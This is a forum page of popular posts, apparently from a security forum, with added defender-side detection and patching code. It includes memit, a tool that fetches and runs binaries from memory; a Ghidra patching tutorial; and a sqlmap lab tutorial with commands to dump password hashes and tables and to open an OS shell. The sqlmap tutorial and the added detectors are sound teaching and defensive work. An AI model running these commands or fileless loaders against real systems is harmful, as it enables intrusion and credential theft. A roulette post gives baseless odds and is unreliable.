Popular Content

Showing content with the highest reputation on 12/06/21 in all areas

  1. Memit

     Execute a binary from memory, without touching the disk. Linux only. Available as both a Go module and a binary.

     Using the Go module

     The Command() method takes an io.Reader, so you can use it with things like an HTTP response body, a bytes.Buffer, etc. It provides an *exec.Cmd (via memit.Command(...)) so you can wire up stdin/out and configure other parameters just like you would with a regular command.

         package main

         import (
             "net/http"
             "os"

             "github.com/liamg/memit"
         )

         func main() {
             // The HTTP response body is an io.Reader, so it can be fed straight to memit.
             resp, _ := http.Get("https://.../mybinary")
             // Build an *exec.Cmd from the in-memory image; remaining arguments go to the binary.
             cmd, _, _ := memit.Command(resp.Body, "--args", "--go", "--here")
             cmd.Stderr = os.Stderr
             cmd.Stdin = os.Stdin
             cmd.Stdout = os.Stdout
             _ = cmd.Run()
         }

     Using the binary

     Grab the latest release and run it like this:

         memit https://.../mybinary -- # args for the actual binary can be put after the --

     Source: https://github.com/liamg/memit
    3 points
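An added defender-side example, not from the memit README above: the README does not say how the binary stays off disk, so this assumes the common memfd_create approach, under which the process's /proc/<pid>/exe link reads "/memfd:<name> (deleted)" instead of a filesystem path. The scan below flags such processes; the link targets used for the offline run are constructed.

```python
"""Flag Linux processes whose executable image has no backing file on disk."""
import os
import re

# Constructed /proc/<pid>/exe link targets, as os.readlink() would return them.
SAMPLE_EXE_LINKS = {
    1234: "/usr/bin/bash",
    2345: "/memfd:mybinary (deleted)",   # assumption: memfd_create-backed image
    3456: "/tmp/build/a.out (deleted)",  # on-disk binary unlinked after start
    4567: "/usr/lib/systemd/systemd",
}

MEMFD_RE = re.compile(r"^/memfd:")

def classify_exe_link(target: str) -> str:
    """'memfd' for in-memory images, 'deleted' for unlinked on-disk
    binaries, otherwise 'file'."""
    if MEMFD_RE.match(target):
        return "memfd"
    if target.endswith(" (deleted)"):
        return "deleted"
    return "file"

def suspicious_pids(exe_links: dict[int, str]) -> dict[int, str]:
    """Keep only the PIDs whose exe link is not an ordinary on-disk file."""
    return {pid: kind for pid, target in exe_links.items()
            if (kind := classify_exe_link(target)) != "file"}

def read_procfs_exe_links() -> dict[int, str]:
    """Live collection: readlink /proc/<pid>/exe for every numeric entry.
    Kernel threads and processes we may not inspect are skipped."""
    links = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            links[int(name)] = os.readlink(f"/proc/{name}/exe")
        except OSError:
            continue
    return links

if __name__ == "__main__":
    for pid, kind in suspicious_pids(SAMPLE_EXE_LINKS).items():
        print(f"pid {pid}: {kind}")
```

Running it against read_procfs_exe_links() instead of the sample dict gives the live view; a deleted-but-on-disk binary is reported separately because it is a weaker signal than a memfd image.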
  2. Ghidra 101: Binary Patching

     CRAIG YOUNG, NOV 28, 2021, IT SECURITY AND DATA PROTECTION

     In this blog series, I will be putting the spotlight on useful Ghidra features you may have missed. Each post will look at a different feature and show how it helps you save time and be more effective in your reverse engineering workflows. Ghidra is an incredibly powerful tool, but much of this power comes from knowing how to use it effectively.

     There are several circumstances where it can be helpful to make a modification to code or data within a compiled program. Sometimes, it is necessary to fix a vulnerability or compatibility issue without functional source code or compilers. This can happen when source code gets lost, systems go out of support, or software firms go out of business. In case you should find yourself in this situation, keep calm and read on to learn how to do this within Ghidra.

     Until recently, Ghidra was rather limited in this capability. This changed with the summer 2021 release of Ghidra 10.0, which introduced the ability to export programs with proper executable formats for Windows (PE) and Linux (ELF). Ghidra versions before 10, or executable formats besides PE and ELF, require using a raw import and raw export, which is generally far less robust. In this post, I will review a Windows x86 executable, but the general strategy is applicable more broadly with some nuances for specific platforms and architectures.

     Strategies

     The first step for preparing a program patch is to gauge the complexity/length of the required patch and identify roughly where it needs to be inserted. If the patch is short enough, it may be possible to directly replace existing code inline. Patches introducing completely new functionality generally cannot be written inline and will require a different strategy. In this scenario, we must locate unused bytes which are loaded from the program file into executable memory space. These code caves are commonly generated when an executable section requires specific byte alignment. Longer patches can be written into a code cave along with appropriate branching instructions to insert the patch code into the right code path.

     Let's take an example to see this process in action. In case you haven't seen them, MalwareTech has a fun set of reversing and exploitation challenges available online. Each reversing challenge presents an executable which, when executed, will display a message box containing the MD5 sum of a secret flag string. You are expected to recover the flag string using only static analysis techniques, but for this blog, we will be altering and then running the challenge program to directly print the flag. (Don't worry, it's not cheating if it is in the name of science, right?)

     Shellcode2.exe_

     In this post, I will use the shellcode2 challenge, and I encourage readers to follow along and then attempt to repeat the process with a different challenge file. The objective for our patch is to reveal the flag value after it has been decoded by the shellcode and before it has been hashed. Let's start by looking at how shellcode2.exe_ is structured:

     In this snippet, we see local_bc being initialized as an MD5 object followed by the construction of a stack string. When looking at the end of the entry function, we can see where the flag is hashed and the message box is created:

     In this snippet, the MD5 object at local_bc is being referenced to invoke the MD5::digestString() method with the address of local_2c as input. A reference to the resulting hash is stored at local_c0. The instructions from 4023a2-4023b2 pass this value into the MessageBoxA API call with a particular window title and style.

     Patching

     The first patch we'll look at is to change the arguments to MessageBoxA so that it prints the value from local_2c rather than the value referred to by local_c0. The address of the hash is loaded into EAX with the MOV instruction at 4023a9 and then pushed to the stack as an argument for MessageBoxA. This will need to be patched so that the address of local_2c is pushed instead. The LEA (Load Effective Address) instruction allows us to do just that. Begin by right-clicking the MOV instruction and selecting Patch Instruction:

     The instruction will change to an editable field with autocompletion:

     Patch this to be LEA with the operands EAX, [EBP + -0x28] so that EAX receives the address of local_2c:

     Note that the use of -0x28 rather than -0x2c as an offset to EBP is to account for the original EBP being pushed to the stack before EBP is loaded with the new stack pointer. The resulting offset is converted to its two's complement as shown here:

     The program can now be exported from the File -> Export Program menu as PE format. Running the exe file produces our new MessageBoxA:

     Source: https://www.tripwire.com/state-of-security/security-data-protection/ghidra-101-binary-patching/
    2 points
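A worked counterpart to the patch above, added here and not part of the Tripwire post or of Ghidra: encoding `lea eax, [ebp-0x28]` by hand shows the disp8 stored as the two's complement byte 0xD8, and the in-place patch routine checks that the original bytes are what we expect and that the replacement fits before it writes anything. The original instruction bytes in the demo are constructed, not taken from shellcode2.exe_; the only value from the post is the -0x28 displacement.

```python
"""Encode `eax <- [ebp + disp]` instructions and apply an inline patch safely."""
import struct

# Opcodes for the two forms the post swaps: MOV r32, r/m32 and LEA r32, m.
OPCODES = {"mov": 0x8B, "lea": 0x8D}

def twos_complement_byte(disp: int) -> int:
    """The signed 8-bit displacement as the byte actually stored, e.g. -0x28 -> 0xD8."""
    if not -128 <= disp <= 127:
        raise ValueError("displacement does not fit in a disp8")
    return disp & 0xFF

def encode_eax_ebp(mnemonic: str, disp: int) -> bytes:
    """Encode `mov eax, [ebp+disp]` or `lea eax, [ebp+disp]` for 32-bit x86.
    ModRM 0x45 = mod 01 (disp8), reg 000 (EAX), rm 101 (EBP); when the offset
    does not fit a signed byte, ModRM 0x85 (mod 10) with a little-endian disp32."""
    opcode = OPCODES[mnemonic]
    if -128 <= disp <= 127:
        return bytes([opcode, 0x45, twos_complement_byte(disp)])
    return bytes([opcode, 0x85]) + struct.pack("<i", disp)

def patch_inline(image: bytes, offset: int, expected: bytes, new_code: bytes) -> bytes:
    """Overwrite `expected` at `offset` with `new_code`, NOP-padding to the same length.
    Two guards: the bytes present must match what we think is there (otherwise wrong
    build or wrong offset), and the patch must not spill into the next instruction
    (a longer patch is the code-cave case the post describes, not an inline one)."""
    if image[offset:offset + len(expected)] != expected:
        raise ValueError("bytes at offset do not match the expected instruction")
    if len(new_code) > len(expected):
        raise ValueError("patch longer than the instruction it replaces; use a code cave")
    padded = new_code + b"\x90" * (len(expected) - len(new_code))  # 0x90 = NOP
    return image[:offset] + padded + image[offset + len(expected):]

def demo_patch() -> bytes:
    """Constructed snippet: `mov eax, [ebp-0x100]` (6 bytes, disp32) then `push eax`.
    The MOV displacement is made up; only the LEA target -0x28 comes from the post."""
    original_mov = encode_eax_ebp("mov", -0x100)   # 8B 85 00 FF FF FF
    image = original_mov + b"\x50"                  # 0x50 = push eax
    new_lea = encode_eax_ebp("lea", -0x28)          # 8D 45 D8
    return patch_inline(image, 0, original_mov, new_lea)

if __name__ == "__main__":
    print(demo_patch().hex(" "))  # 8d 45 d8 90 90 90 50
```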
  3. Hi! For anyone interested, Oracle Cloud offers a free VPS instance with 4 vCPU and 24 GB RAM. Downside: you have to verify with a card, i.e. they charge a sum of 4 lei which is then refunded. A beginner's tutorial HERE
    1 point
  4. I think Azure also offered something free, up to 300 USD; not sure about GCP. I'd just recommend being careful with what you do there, so you don't wake up later to find a nice sum of money gone from your card.
    1 point
  5. Attackers can use the tool to get into a database, and potentially the server! Sqlmap is capable of providing a SQL shell into the database, allowing an attacker to potentially execute any arbitrary SQL command. Moreover, sqlmap also has an option to provide the attacker with an OS shell, with which the attacker can execute any arbitrary OS commands! (SQL injection leading to command injection!) Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks, so attackers can even use this tool to get your passwords!

     For defender

     Defenders can use sqlmap for penetration testing of their web applications, servers, and databases. Use the tool to crack weak passwords, assess whether the database is run with restrictive privileges, and to detect any potential injection holes in the application.

     Options

     Sqlmap is a command line tool, and just like any other Unix utility, one can find all the options they need to know by simply invoking the -h flag, i.e. sqlmap -h, which will display all the options the tool accepts. Essentially, to use sqlmap, all you need to know is the URL of the target web application along with the parameters to target for injection. Here are the most common options to remember for using sqlmap:

     To fingerprint a database:

         sqlmap -u "URL?name=value" --data="name=&name=value" --cookie="name=value" -f

     To identify database users, passwords, roles & privileges:

         sqlmap -u "" --users --passwords --privileges --roles

     To get database tables & columns:

         sqlmap -u "" --tables --columns --dump

     There are numerous other options, all of which can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage

     Tutorial / Demo

     Installation Instructions

     All the demonstrations are within a custom VM accessible by all students on the dh2020pc00 machine. Grab a copy of CustomUbuntu804Server.zip from the /virtual/injection/ directory on the dh2020pc00 machine. Ex:

         scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER
         cd /virtual/$USER
         unzip CustomUbuntu804Server.zip

     Run VMplayer, open the VM you just unzipped, and use NAT or VMNET8 for the Network Adapter setting. Login with username root and password password. Note down the IP address shown (/sbin/ifconfig should show you the IP address if you missed it). We will refer to $ipaddress as the IP address that showed up for you, for the subsequent steps.

     Tutorial

     Sqlmap has been installed on the custom VM that you just set up. From a terminal, sqlmap -h will show the options of sqlmap. The following tutorial uses the very vulnerable fourFours application accessible in the browser at $ipaddress/fourFours.

     Fingerprint the database and server hosting fourFours using sqlmap:

         sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login"

     Get all tables of the public database:

         sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public

     Get all columns and data of the fourfoursuser table from the public database:

         sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser

     Dump all database table entries:

         sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --dump-all

     Prompt to get an OS shell!

         sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell
    1 point
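An added defender-side counterpart to the "For defender" note above (example code, not from the post or from sqlmap): a small access-log check that flags requests whose User-Agent names the tool and, more usefully, bursts of injection-shaped payloads from one client against one endpoint. The log lines are constructed; the fourFours path only mirrors the demo application from the post.

```python
"""Spot sqlmap-style probing in web access logs: tool User-Agent plus payload bursts."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access log lines (not real traffic); the
# fourFours path mirrors the demo app from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2021:10:00:01 +0000] "GET /fourFours/index.php?user=Alex HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2021:10:00:02 +0000] "GET /fourFours/index.php?user=Alex%27%20AND%201%3D1--%20 HTTP/1.1" 200 530 "-" "sqlmap/1.5 (https://sqlmap.org)"
10.0.0.9 - - [06/Dec/2021:10:00:02 +0000] "GET /fourFours/index.php?user=Alex%27%20UNION%20SELECT%20NULL-- HTTP/1.1" 500 0 "-" "sqlmap/1.5 (https://sqlmap.org)"
10.0.0.9 - - [06/Dec/2021:10:00:03 +0000] "GET /fourFours/index.php?user=Alex%27%20AND%20SLEEP%285%29-- HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Dec/2021:10:00:04 +0000] "GET /fourFours/index.php?user=O%27Brien HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A quote followed by an SQL keyword, or a comment terminator. A lone apostrophe
# in a name like O'Brien is deliberately not enough to fire.
PAYLOAD_RE = re.compile(r"'\s*(and|or|union|select|sleep|waitfor)\b|--\s*$|/\*", re.I)

def parse_line(line: str):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def has_sql_payload(url: str) -> bool:
    """parse_qsl percent-decodes each query value; look for injection-shaped content."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return any(PAYLOAD_RE.search(v) for _, v in pairs)

def analyse(log_text: str, burst_threshold: int = 2) -> dict:
    """Return {ip: reasons}. 'ua' means the agent string names the tool (weak on its
    own, since it is configurable); 'burst' means one client sent at least
    burst_threshold payload-bearing requests to a single path."""
    findings: dict[str, list[str]] = {}
    payload_hits: Counter = Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        reasons = findings.setdefault(rec["ip"], [])
        if "sqlmap" in rec["ua"].lower() and "ua" not in reasons:
            reasons.append("ua")
        if has_sql_payload(rec["url"]):
            payload_hits[(rec["ip"], urlsplit(rec["url"]).path)] += 1
    for (ip, _path), n in payload_hits.items():
        if n >= burst_threshold:
            findings.setdefault(ip, []).append("burst")
    return {ip: r for ip, r in findings.items() if r}
```

POST bodies such as the --data payloads in the tutorial do not appear in a standard access log, so this only sees query-string probing; a WAF or application-level log is needed for the body case.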
  6. Most chat applications (Teams, Zoom, GoToMeeting, Google Chat) have a screen sharing option through which you can stream in real time what is happening on a monitor you have selected. It is not an actual camera, but an option within the application.
    1 point
  7. https://www.youtube.com/watch?v=_LWwqbHU8L0 https://www.youtube.com/watch?v=YA6SGQlVmcA
    1 point
  8. Pay attention here: you bet Red Red Black continuously until one of them hits. Then check whether: if the next one in the series is black, then it is 99% certain that next time the series is: "R N N R N N R R R R"; if the next one in the series is red, then it is 30% certain that next time the series is: "N R R N R R N N N N". This works on 60-70% of software newer than April 2019. On topic: the post is from 2009, may God give you health and luck!
    1 point